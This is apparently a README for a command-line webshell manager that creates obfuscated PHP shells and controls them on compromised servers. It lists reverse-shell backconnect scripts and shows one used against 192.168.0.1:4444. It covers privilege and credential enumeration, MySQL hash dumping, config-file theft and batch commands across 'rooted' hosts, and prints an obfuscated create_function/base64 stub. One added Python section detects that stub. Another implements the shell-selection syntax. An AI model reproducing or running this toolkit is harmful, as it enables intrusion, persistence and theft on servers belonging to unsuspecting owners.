Command line interface to create and control minimalistic php/jsp shells.
- searchable and editable shell database
- alias
- comment
- geoip
- domain
- shell information
- pr
- tic
- creation time
- access time
- shell manager
- execute command or script on all shells
- execute command or script on a selection of shells
- overall stats
- total shells
- unique hosts
- utility commands
- cd
- edit
- upload
- download
- touch
- sed log cleaner
- tab autocompletion
- bash scripts
info - gather general information (runs on login)
php - list interesting php settings
av - detect common security software
kernel - kernel info
tech - detect useful software
dir - list contents of interesting dirs
global_suid - find all suid files
global_sgid - find all sgid files
global_write - find globally writeable files belonging to other users
users - list users
users_home - list contents of all $HOME dirs
users_file - list interesting files from all $HOME dirs
users_write - find writeable files in all $HOME dirs recursively
users_read - find readable files in all $HOME dirs recursively
process - list all processes
demo - reference for syntax quirks(!)
- backconnects
bash_dev.sh [ip] [port]
nc_e.sh [ip] [port]
nc_mknod.sh [ip] [port]
php.sh [ip] [port]
pl.sh [ip] [port]
pl_sys.sh [ip] [port]
py.sh [ip] [port]
rb.sh [ip] [port]
rb_popen.sh [ip] [port]
telnet_mknod.sh [ip] [port]
telnet_split.sh [ip] [stdin-port] [stdout-port]
- commands encrypted (badly!) and passed via cookies
- uploads optionally sent via post
- embeddable into other scripts
- error messages hidden
- shell.php stub executes php payloads via include
- shell.php stub delegates OS command invocation to payloads
- b64.php cryptor obfuscates stub via pseudo-random variables and create_function
- php scripts
ls.php - list files
cat.php - cat file
drivers.php - list available database drivers
tree_table.php - show db hierarchy down to tables [driver] [username] [password]
tree_column.php - show db hierarchy down to columns [driver] [username] [password]
db.php - show databases [driver] [username] [password]
table.php - show tables [driver] [username] [password] [database]
column.php - show columns [driver] [username] [password] [database] [table]
pdo.php - query database [driver] [username] [password] [query]
loot_mysql.php - dump mysql hashes [username] [password]
Typical shell (shell.php stub and b64.php cryptor):
<?
$dYtKLa=null;
$XmzZZB='n5fgacrn5fgaean5fgate_fn5fgan5fgaunctin5fgaonn5fga';
$myC_YojOmE=str_replace('n5fga',$dYtKLa,$XmzZZB);
$bXxLybtZj='base25aWp25aWp625aWp4_25aWpd25aWp25aWpecod25aWpe25aWp';
$QRGzlAVFD=str_replace('25aWp',$dYtKLa,$bXxLybtZj);
$RMWnbJn_mqQ='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';
$jTOWXgk=$myC_YojOmE($dYtKLa,$QRGzlAVFD($RMWnbJn_mqQ));
$jTOWXgk();
?>
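The stub above hides create_function and base64_decode behind str_replace with a throw-away junk token, so naive string matching on either name fails. The following Python script is an added example and not part of this project: it resolves that layer statically (strips the junk token to recover the real function names, then decodes the payload) and doubles as a cheap detection check for this stub shape. The embedded stub is constructed for the example with a harmless base64 echo payload; a real stub's payload differs.

```python
import base64
import re

# Constructed stub in the same shape as the one shown above. The base64 payload
# here is a harmless echo chosen for the example (assumption: real payloads differ).
SAMPLE_STUB = r"""<?
$dYtKLa=null;
$XmzZZB='n5fgacrn5fgaean5fgate_fn5fgan5fgaunctin5fgaonn5fga';
$myC_YojOmE=str_replace('n5fga',$dYtKLa,$XmzZZB);
$bXxLybtZj='base25aWp25aWp625aWp4_25aWpd25aWp25aWpecod25aWpe25aWp';
$QRGzlAVFD=str_replace('25aWp',$dYtKLa,$bXxLybtZj);
$RMWnbJn_mqQ='ZWNobyAiaGVsbG8iOw==';
$jTOWXgk=$myC_YojOmE($dYtKLa,$QRGzlAVFD($RMWnbJn_mqQ));
$jTOWXgk();
?>"""

# $x=null;  -> the "empty" replacement argument handed to str_replace
NULL_RE = re.compile(r"\$(\w+)\s*=\s*null\s*;")
# $x='...'; -> junk-padded names and the base64 payload
STR_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
# $x=str_replace('junk',$empty,$padded);
REPLACE_RE = re.compile(r"\$(\w+)\s*=\s*str_replace\('([^']+)',\s*\$(\w+),\s*\$(\w+)\)\s*;")
# $f=$ctor($empty,$decoder($payload));  -> create_function(null, base64_decode(...))
BUILD_RE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\(\$(\w+),\s*\$(\w+)\(\$(\w+)\)\)\s*;")


def deobfuscate(src: str) -> dict:
    """Statically resolve the str_replace/base64 layer of a stub.

    Returns the recovered variable->name map, the constructor and decoder
    names actually called, and the decoded payload (None if not recoverable).
    """
    nulls = set(NULL_RE.findall(src))
    strings = dict(STR_RE.findall(src))

    names = {}
    for target, junk, empty_var, source in REPLACE_RE.findall(src):
        # Only trust the rewrite when the replacement really is an empty value
        # and the source is a literal we have seen.
        if empty_var in nulls and source in strings:
            names[target] = strings[source].replace(junk, "")

    result = {"names": names, "constructor": None, "decoder": None, "payload": None}
    m = BUILD_RE.search(src)
    if m:
        _, ctor_var, _, dec_var, payload_var = m.groups()
        result["constructor"] = names.get(ctor_var)
        result["decoder"] = names.get(dec_var)
        if result["decoder"] == "base64_decode" and payload_var in strings:
            raw = base64.b64decode(strings[payload_var])
            result["payload"] = raw.decode("utf-8", "replace")
    return result


def looks_like_stub(src: str) -> bool:
    """Detection rule: junk-stripped create_function fed by base64_decode."""
    info = deobfuscate(src)
    return info["constructor"] == "create_function" and info["decoder"] == "base64_decode"


if __name__ == "__main__":
    info = deobfuscate(SAMPLE_STUB)
    print("constructor:", info["constructor"])
    print("decoder:    ", info["decoder"])
    print("payload:    ", info["payload"])
    print("stub shape: ", looks_like_stub(SAMPLE_STUB))
```

The decoder is deliberately narrow: it only rewrites a name when the str_replace target is a variable assigned null and the source is a literal it has seen, so a stub that feeds the names through another layer comes back with None rather than a guess. For triage across a webroot, run looks_like_stub over every .php file and deobfuscate only the hits.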
Development ongoing!
- commands converted to hex and passed via cookies
Install and start the tool:
virtualenv env
. env/bin/activate
pip install -r requirements
./shell.py
Then, at the prompt, list the available commands:
help
Create a php shell:
./shell.py
load shellallthethings
use shell
options
set url http://domain.tld/shell.php
set alias haxhaxhax
set action PHPS3SS1D
set comment 1337
set outfile /tmp/shell.php
generate shell.php
Change the url for @haxhaxhax shell:
url @haxhaxhax http://domain.tld/images/1.php
List shells:
list
View info about @haxhaxhax:
info @haxhaxhax
Connect to shell:
connect @haxhaxhax
Execute commands:
ls
pwd
id
uname -a
cat /etc/passwd
Shell mode uses a special @ escape symbol for commands.
View help:
@help
Change dir to /tmp:
@cd /tmp
Change dir to $HOME:
@cd
Relative dirs are also supported:
@cd ../
Touch shell:
@touch
Download file:
@download cms/config/db.php /tmp/db.php
Run custom php code:
@eval { echo "haxhaxhax"; }
Run a php script (contrary to the cmd name, the script is actually uploaded to a tmp dir and included, not eval'ed):
@eval php.php
View available database drivers:
@eval drivers.php
View the db hierarchy:
@eval tree_table.php mysql toor E1!t3
Run a custom query:
@eval pdo.php mysql toor E1!t3 "select * from cms.customers;"
Run a bash script:
@script tech
Depending on the output choose a relevant backconnect:
@backconnect telnet_mknod.sh 192.168.0.1 4444
Connection issues can be mitigated by choosing a different port or a different backconnect.
Change transport method to post for file uploads (>4kb):
@options
@set transport post
Upload file:
@upload /tmp/proxy.php 2.php
Binary files need to be encoded to base64:
base64 exploit > xpl.b64
And then decoded server side:
base64 -d xpl.b64 > exploit
Support for binary uploads is planned. If all else fails (i.e. no base64 on the server) then you can write a quick php script to make the upload.
Set transport method to default value:
@unset transport
Edit a file (will download file, launch your editor, check if changes were made and overwrite existing version):
@edit hacked.txt
Leave shell via ctrl+c.
Create a comment for @haxhaxhax:
comment @haxhaxhax "lulz rooted"
Search for shells by comment and domain:
search comment:"rooted" domain:*.tld
Execute script on all shells:
select domain:*|script kernel
Execute command on specific shells:
select comment:rooted|cmd uname -a;id
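The search/select syntax is shown above only by example. The following Python is an added illustration, not the tool's own code, of one way to implement it: key:value terms, double-quoted values, glob patterns matched with fnmatch, and splitting of a select line at the first | into the filter part and the action to run on every matching shell. The shell database entries are constructed for the example; treating a bare word without wildcards as a substring match (so comment:rooted hits "lulz rooted") is an assumption about the real tool's behaviour.

```python
import fnmatch
import re

# Constructed in-memory shell database (assumption: the real tool keeps it on
# disk with more fields; these three entries are illustrative only).
SHELL_DB = [
    {"alias": "haxhaxhax", "domain": "domain.tld", "comment": "lulz rooted"},
    {"alias": "cms2", "domain": "shop.example.tld", "comment": "rooted, cron persistence"},
    {"alias": "staging", "domain": "staging.example.org", "comment": "low priv"},
]

# key:value  or  key:"value with spaces"
TERM_RE = re.compile(r'(\w+):("([^"]*)"|\S+)')


def parse_terms(query: str):
    """Turn 'comment:"rooted" domain:*.tld' into [("comment", "rooted"), ("domain", "*.tld")]."""
    terms = []
    for key, raw, quoted in TERM_RE.findall(query):
        value = quoted if raw.startswith('"') else raw
        terms.append((key, value))
    return terms


def term_matches(value: str, pattern: str) -> bool:
    """Glob when the pattern has wildcards, otherwise substring (assumed semantics)."""
    if any(ch in pattern for ch in "*?["):
        return fnmatch.fnmatchcase(value, pattern)
    return pattern in value


def select(db, query: str):
    """Aliases of all shells matching every term of the query (AND semantics)."""
    terms = parse_terms(query)
    return [
        shell["alias"]
        for shell in db
        if all(term_matches(str(shell.get(key, "")), pat) for key, pat in terms)
    ]


def parse_select_line(line: str):
    """Split 'select <filters>|<action> <args>' into (filters, action, args)."""
    if not line.startswith("select "):
        raise ValueError("expected a select line")
    body = line[len("select "):]
    filters, sep, action_part = body.partition("|")
    if not sep:
        raise ValueError("missing '|action' after the filters")
    action, _, args = action_part.strip().partition(" ")
    return filters.strip(), action, args


def plan(db, line: str):
    """Expand a select line into per-shell (alias, action, args) jobs."""
    filters, action, args = parse_select_line(line)
    return [(alias, action, args) for alias in select(db, filters)]


if __name__ == "__main__":
    print(select(SHELL_DB, 'comment:"rooted" domain:*.tld'))
    for job in plan(SHELL_DB, "select comment:rooted|cmd uname -a;id"):
        print(job)
```

Because the pipe is split off before the filters are parsed, a command such as cmd uname -a;id keeps its semicolon intact; the filter parser never sees the action text.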
Run the help command for more information (on each module).